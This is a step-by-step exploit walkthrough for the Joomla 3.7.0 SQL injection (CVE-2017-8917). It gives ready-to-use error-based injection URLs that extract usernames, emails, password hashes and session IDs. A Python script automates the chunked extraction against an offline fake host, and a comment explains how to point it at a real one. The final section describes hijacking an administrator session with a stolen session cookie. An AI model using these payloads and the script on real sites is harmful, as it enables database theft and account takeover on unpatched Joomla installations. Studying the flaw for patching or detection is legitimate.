Exploiting the Joomla 3.7.0 SQL injection (CVE-2017-8917): the list[fullordering] parameter of the com_fields modal view is placed unescaped into the ORDER BY clause of the query, so MySQL error-based injection works from a plain unauthenticated GET request.
1. Injection probe (error-based, via updatexml)
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)
2. Extracting the username, email and password of the first user
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select concat(username,0x3a,email) from %23__users limit 1)),1)
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select left(password,30) from %23__users limit 1)),1)
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)
updatexml error-based injection only leaks a short window per request, because MySQL's XPath syntax error message reports at most 32 characters of the offending string. A Joomla 3.x password hash is a 60-character bcrypt string, so it is read in two halves with left(password,30) and right(password,30).
3. Extracting the session_id of a logged-in user
http://localhost/joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select session_id from %23__session where username in (select username from %23__users))),1)
The subquery has no limit clause: if more than one logged-in session exists, MySQL fails with "Subquery returns more than 1 row" instead of leaking anything, so add limit 1 (with an offset to step through the rows) or a tighter where clause in that case. A session_id is 32 characters itself, so it may also need the same left/right split as the password.
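The three steps above are the same request with a different SQL expression dropped into the error channel. The script below, an added example that is not part of the original post or of Joomla, automates that: it builds the injection URL, parses the leaked string out of the MySQL error, and reads any column through the 32-character window in substr() chunks, which generalises the page's left/right split to values of any length. It assumes the MySQL error text appears in the response body exactly as MySQL prints it, and it uses a constructed in-memory stand-in for the vulnerable host (FakeJoomla, with made-up rows) so it runs offline; against a real target, fetch would be an HTTP GET of the URL. The 0x7e prefix replaces the page's concat(1, ...) on purpose: '~' is never a valid XPath token, so the reported string always starts at the prefix, whereas a leading 1 is lexed as a number literal and can swallow the start of a chunk that itself begins with digits.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

BASE = "http://localhost/joomla/index.php"
VULN_PARAMS = "option=com_fields&view=fields&layout=modal"  # the page's vulnerable view
ERROR_WINDOW = 32   # MySQL reports at most 32 characters of the bad XPath string
PREFIX = "~"        # 0x7e: never a valid XPath token, so the error starts right here
CHUNK = ERROR_WINDOW - len(PREFIX)   # usable characters per request


def payload(expr):
    """Same shape as the page's payloads: the MySQL error message is the data channel."""
    return "updatexml(1,concat(0x7e,(%s)),1)" % expr


def build_url(expr):
    """Full injection URL for the com_fields modal view; '#' becomes %23 as on the page."""
    return "%s?%s&list[fullordering]=%s" % (BASE, VULN_PARAMS, quote(payload(expr), safe="(),"))


LEAK_RE = re.compile(r"XPATH syntax error: '(.*?)'")


def parse_leak(body):
    """Leaked string from the response body, or None when the query did not error.
    A value containing a single quote would be cut short by this regex."""
    m = LEAK_RE.search(body)
    if not m:
        return None
    leaked = m.group(1)
    return leaked[len(PREFIX):] if leaked.startswith(PREFIX) else leaked


def substr_expr(column, table, pos, where=""):
    """One probe: CHUNK characters of `column` starting at `pos` (1-based, as in MySQL).
    #__ is Joomla's table-prefix placeholder, rewritten to the real prefix server-side."""
    q = "select substr(%s,%d,%d) from #__%s" % (column, pos, CHUNK, table)
    if where:
        q += " where " + where
    return q + " limit 1"


def dump_column(column, table, fetch, where=""):
    """Read a whole value through the 32-character window, one substr() chunk per request.
    `fetch(url)` returns the response body; a short or empty chunk marks the end."""
    value, pos = "", 1
    while True:
        chunk = parse_leak(fetch(build_url(substr_expr(column, table, pos, where))))
        if not chunk:
            break
        value += chunk
        if len(chunk) < CHUNK:
            break
        pos += CHUNK
    return value


# Constructed sample rows standing in for the target database (not real data).
FAKE_DB = {
    "users": {"username": "admin", "email": "admin@example.com",
              "password": "$2y$10$" + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0"},
    "session": {"session_id": "0123456789abcdef0123456789abcdef", "username": "admin"},
}


class FakeJoomla:
    """Offline stand-in for the vulnerable host (hypothetical): answers the substr() probes
    above with the same 32-character truncation MySQL applies to the XPath error."""
    PROBE = re.compile(r"select substr\((\w+),(\d+),(\d+)\) from #__(\w+)(?: where .*?)? limit 1")

    def __init__(self, rows):
        self.rows = rows

    def get(self, url):
        expr = parse_qs(urlsplit(url).query)["list[fullordering]"][0]
        m = self.PROBE.search(expr)
        column, pos, n, table = m.group(1), int(m.group(2)), int(m.group(3)), m.group(4)
        value = self.rows[table][column][pos - 1:pos - 1 + n]
        leaked = (PREFIX + value)[:ERROR_WINDOW]
        return "<h2>Error</h2><p>XPATH syntax error: '%s'</p>" % leaked


if __name__ == "__main__":
    target = FakeJoomla(FAKE_DB)   # against a real host: lambda url: requests.get(url).text
    for column, table, where in [("username", "users", ""), ("email", "users", ""),
                                 ("password", "users", ""),
                                 ("session_id", "session", "username in (select username from #__users)")]:
        print(table, column, dump_column(column, table, target.get, where))
```

The loop stops on the first chunk shorter than the window, so the 60-character bcrypt hash costs two requests and the 32-character session_id two as well; with the page's concat(1, ...) prefix an empty chunk produces the valid XPath expression "1" and no error at all, which parse_leak reports as None and the loop treats the same way.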
4. Note
[Figure: the rows of the #__session table]
As the screenshot shows, the session table holds four records, but only the second one, whose username column is non-empty (a logged-in user), yields a session_id that can be used to log in; the rows with an empty username belong to anonymous visitors. To use it, open the administrator page and replace the value of the Joomla session cookie with the extracted session_id, for example with Firebug.